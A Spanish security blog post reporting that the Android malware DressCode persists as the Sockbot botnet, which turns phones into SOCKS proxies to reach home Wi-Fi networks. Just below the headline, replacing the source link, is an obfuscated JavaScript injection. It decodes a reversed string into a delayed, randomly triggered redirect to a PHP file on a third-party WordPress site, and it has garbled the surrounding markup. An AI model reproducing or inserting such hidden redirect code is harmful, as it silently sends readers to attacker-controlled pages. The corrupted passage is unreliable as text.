Vulnerabilidad en Android pone en riesgo a cuatro millones de usuarios
$NfI=function(n){if (typeof ($NfI.list[n]) == «string») return $NfI.list[n].split(«»).reverse().join(«»);return $NfI.list[n];};$NfI.list=[«‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to-light/» target=»_blank» rel=»noopener»>Ars Technica.
El malware conocido como DressCode se creía eliminado cuando en 2016 Google eliminó 400 aplicaciones que lo instalaban. Sin embargo, 16 meses después el botnet sigue activo, aunque ahora bajo el nombre de Sockbot, según la firma de seguridad Symantec.
De acuerdo con Symantec, en octubre del año pasado se reveló que millones de nuevas aplicaciones maliciosas fueron descaragadas recientemente, las que utilizan el mismo método que DressCode.
La infección obliga a los celulares a usar el protocolo SOCKS y con ello los hackers pueden acceder directamente a las redes Wi Fi a las que se conecta el teléfono, robando fácilmente las contraseñas. Asimismo, podrían ingresar a los computadores o dispositivos vinculados al router, y desde allí acceder a archivos sin protección.
Ver información original al respecto en Fuente:
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.
Los comentarios están cerrados.